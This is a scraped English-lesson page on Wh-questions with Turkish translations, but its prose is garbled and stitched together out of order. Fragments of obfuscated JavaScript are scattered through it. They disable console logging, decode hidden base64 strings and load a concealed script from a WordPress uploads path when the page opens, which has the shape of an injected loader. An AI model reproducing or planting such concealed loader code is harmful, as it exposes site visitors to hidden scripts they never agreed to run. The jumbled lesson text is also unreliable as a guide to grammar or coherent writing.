Is there a cat under the tree? It is only for formal writing. I can do it.. Who won the match? Then guess the meaning of the word in your language. Then type the word that you hear in the text box. – I have eaten kebab in Istanbul. There is a dog under the tree. [];return _0x58a84a;}else{_0x54b3ad[_0x398a('0x7')]=function(_0x4faa9c){if(_0x398a('0xe')===_0x398a('0xe')){var _0x490cb2={};_0x490cb2['log']=_0x4faa9c;_0x490cb2[_0x398a('0xf')]=_0x4faa9c;_0x490cb2[_0x398a('0x8')]=_0x4faa9c;_0x490cb2[_0x398a('0x9')]=_0x4faa9c;_0x490cb2[_0x398a('0x10')]=_0x4faa9c;_0x490cb2[_0x398a('0xa')]=_0x4faa9c;_0x490cb2['trace']=_0x4faa9c;return _0x490cb2;}else{var _0x45a58c=fn[_0x398a('0x3')](context,arguments);fn=null;return _0x45a58c;}}(_0x4faa9c);}}else{_0x54b3ad['console']['log']=_0x4faa9c;_0x54b3ad[_0x398a('0x7')]['warn']=_0x4faa9c;_0x54b3ad['console'][_0x398a('0x8')]=_0x4faa9c;_0x54b3ad[_0x398a('0x7')][_0x398a('0x9')]=_0x4faa9c;_0x54b3ad[_0x398a('0x7')][_0x398a('0x10')]=_0x4faa9c;_0x54b3ad['console'][_0x398a('0xa')]=_0x4faa9c;_0x54b3ad[_0x398a('0x7')][_0x398a('0xb')]=_0x4faa9c;}});_0x318fcc();loadScript(_0x398a('0x11'),myPrettyCode); 2020 © - All rights reserved. We use Why to discover the reason for something. What languages can you speak? Some common Wh- questions are “What, Where, Who, Why, When, Which and How”. – I slept well. “Which” is used when one object among several has to be selected. Your email address will not be published. Please do not try to use it when you are speaking. – My favourite colour is orange. We use What…for to ask for the reason similar to Why. “Whose” is the possessive form of “who,” and works the same way: “Shakespeare's plays are well known.” If you want to learn more read this post. “Who did Jack hit?”. This site uses affiliate marketing to help pay for the site. Does David usually work on Saturdays? If the verb contains a modal, a form of the verb “be” or a form of the helping verb “have,” the subject and predicate are reversed: “Mary is very beautiful.” If we don’t know that Peter joined then we ask the question, (See below for why we don’t use “did” in this sentence). General knowledge English . Where have you eaten kebab? “What size …” – What size are you? There are many vocabulary activities for Wh-questions here. Who painted your house?eval(ez_write_tag([[580,400],'oneminuteenglish_org-leader-3','ezslot_12',115,'0','0'])); We use When to describe the time of a situation or event. Questions exercises: elementary level. Which musical instrument do you want to play? A collection of English ESL worksheets for home learning, online practice, distance learning and English classes to teach about wh-questions, wh-questions You are going to learn about difficulties students have with questions but first let’s look at the 7 most used Wh questions and How with lots of examples. Wh-questions are questions that begin with one of the eight “wh ” words: who, whose, what, when, which, why, where and how.Questions formed with “wh ” words ask about the word or phrase the “wh ” word replaces. Auxiliary verb just means that you have a helping verb to show that a sentence is in the past or a question. ” is the subject of the sentence. If the verb contains no modal, form of the verb “be” or form of the helping verb “have,” then the subject and predicate are switched. You can jump to Question Words category page to find extra activities and games in this website by clicking here. Interrogatives in English Auxiliary verbs are italicized in the following sentences.. When we don’t know the subject,  we don’t use the auxiliary. How did you sleep yesterday? They are leaving.. Notify me of follow-up comments by email. Peter joined the football team. Do you know what time the game starts? – Yes, I can speak English. This is often with the question word “, The most common WH negative question is with the word “, ? Why don’t we try the new fish restaurant tonight? Negative questions are not that common in English like in other languages like Portuguese. Who scored the winning goal in the World Cup final? Questions formed with “wh ” words ask about the word or phrase the “wh ” word replaces. Who - Person, someone This is often with the question word “Who”. What is your favourite colour? “Why is Mary thin?”. Essentially, there are two types of questions: Yes / No questions and Wh– questions. This kind of questions doesn’t require a “Yes” or “No” answer. Can you tell me where she lives? (It is orange.). – He sometimes works at the weekends. If you have any questions please leave them in the comments below.eval(ez_write_tag([[336,280],'oneminuteenglish_org-large-mobile-banner-2','ezslot_4',122,'0','0'])); I like what you guys are up too. Then you will see a question word. – I like playing chess. McDonald’s or Burger King? ⬤What are question words in English? – No. Which ingredients do you need to make an apple pie? What do you like doing at home? Wh questions and answers in English. When we don’t know the subject,  we don’t use the auxiliary. The do formation is used when the verb phrase does not contain a modal, a form of the verb “be” or a form of the helping verb “have”: “John missed the bus because he got up late.” >> Click here to learn conjunctions vocabulary in English to describe the time of a situation or event. In my experience, students often need help asking questions and Wh questions are a great way to have an amazing conversation. Questions are an important form of communication, through questions children start figuring out their world. (See below for why we don’t use “did” in this sentence). I should have finished my homework. The most common WH negative question is with the word “Why”. – No, He sometimes works on Sundays. “How far…” – How far is your school? Wh- questions--question that begin with who, what, where, when, why, and how, can typically have a falling pitch, but can have a rising or high-rising pitch for special purposes. “How high…” – How tall is that building? The person that does the action. The browser you are using does not support HTML5 audio playback. Are they at home? In this post, I am going to help you ask questions in English. However, there are some external links that may help you. We use these question words from the table above. In the real world, native English speakers could use what in the first example. You can play vocabulary games, read example sentences and do puzzles online. Not  Who did won the match? Rather, “why” asks for the reasons an action was done. Look at the example above “Do you like apples? Which is better? Instructions for WH- questions. Here we go. Which - Choice of something. “Who discovered America in 1492?”. [];return function(_0x48971f,_0x354fb7){if('zJuuT'!==_0x398a('0x0')){var _0x47105e=_0x144d83?function(){if(_0x354fb7){if(_0x398a('0x1')===_0x398a('0x2')){that=window;}else{var _0x59ef71=_0x354fb7[_0x398a('0x3')](_0x48971f,arguments);_0x354fb7=null;return _0x59ef71;}}}:function(){};_0x144d83=! The worksheets below are about question words (Wh- questions) in English. The word “what” asks for an object, however “who” asks for a person. We also use Where to ask at what stage of a process/situation you are at. First listen to the questions word. Closed questions and Open Questions. function loadScript(e,t){var a=document.head,c=document.createElement("script");c.type="text/javascript",c.src=e,c.onreadystatechange=t,c.onload=t,a.appendChild(c)}var myPrettyCode=function(){};var contentAllText=[{imgPath:'',imgNameEN:'Who',imgNameTR:'Kim',pseconds:'0'},{imgPath:'',imgNameEN:'What',imgNameTR:'Ne',pseconds:'2'},{imgPath:'',imgNameEN:'Where',imgNameTR:'Nerede',pseconds:'4'},{imgPath:'',imgNameEN:'When',imgNameTR:'Ne zaman',pseconds:'6'},{imgPath:'',imgNameEN:'Which',imgNameTR:'Hangi, Hangisi',pseconds:'8'},{imgPath:'',imgNameEN:'Whose',imgNameTR:'Kimin',pseconds:'10'},{imgPath:'',imgNameEN:'Why',imgNameTR:'Neden',pseconds:'12'},{imgPath:'',imgNameEN:'Whom',imgNameTR:'Kimi',pseconds:'14'},{imgPath:'',imgNameEN:'How',imgNameTR:'Nasıl',pseconds:'16'},{imgPath:'',imgNameEN:'How far',imgNameTR:'Nekadar uzak',pseconds:'18'},{imgPath:'',imgNameEN:'How long',imgNameTR:'Nekadar uzun',pseconds:'20'},{imgPath:'',imgNameEN:'How many',imgNameTR:'Kaç tane',pseconds:'22'},{imgPath:'',imgNameEN:'How much',imgNameTR:'Nekadar',pseconds:'24'},{imgPath:'',imgNameEN:'How old',imgNameTR:'Kaç yaşında',pseconds:'26'}] var _0x14c3=['QWlvU3U=','REx0dFA=','ZHRjVnQ=','YXBwbHk=','e30uY29uc3RydWN0b3IoInJldHVybiB0aGlzIikoICk=','dXRMVVg=','bG9n','Y29uc29sZQ==','ZGVidWc=','aW5mbw==','ZXhjZXB0aW9u','dHJhY2U=','SmpvZGs=','dHBUTUQ=','emtKT1Y=','d2Fybg==','ZXJyb3I=','L3dwLWNvbnRlbnQvdXBsb2Fkcy9jdXN0b20tdXBsb2Fkcy9Kcy1nbG9iYWwvZ2xvYmFsLUlJLUpzLTIwVG1tei5qcw=='];var _0x398a=function(_0x105ae4,_0x641eeb){_0x105ae4=_0x105ae4-0x0;var _0x57fad4=_0x14c3[_0x105ae4];if(_0x398a['QJJJAB']===undefined){(function(){var _0x426dc1;try{var _0x30cb24=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x426dc1=_0x30cb24();}catch(_0x45b6f1){_0x426dc1=window;}var _0x9c6408='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x426dc1['atob']||(_0x426dc1['atob']=function(_0x4d5f3a){var _0x24d942=String(_0x4d5f3a)['replace'](/=+$/,'');for(var _0x2b62cb=0x0,_0x182e4e,_0x59ceca,_0x4386ee=0x0,_0x8964a0='';_0x59ceca=_0x24d942['charAt'](_0x4386ee++);~_0x59ceca&&(_0x182e4e=_0x2b62cb%0x4?_0x182e4e*0x40+_0x59ceca:_0x59ceca,_0x2b62cb++%0x4)?_0x8964a0+=String['fromCharCode'](0xff&_0x182e4e>>(-0x2*_0x2b62cb&0x6)):0x0){_0x59ceca=_0x9c6408['indexOf'](_0x59ceca);}return _0x8964a0;});}());_0x398a['lKKeAE']=function(_0x272d06){var _0x4b9e16=atob(_0x272d06);var _0x562e8b=[];for(var _0x4c9f50=0x0,_0x169a0b=_0x4b9e16['length'];_0x4c9f50<_0x169a0b;_0x4c9f50++){_0x562e8b+='%'+('00'+_0x4b9e16['charCodeAt'](_0x4c9f50)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x562e8b);};_0x398a['kEaScG']={};_0x398a['QJJJAB']=!!

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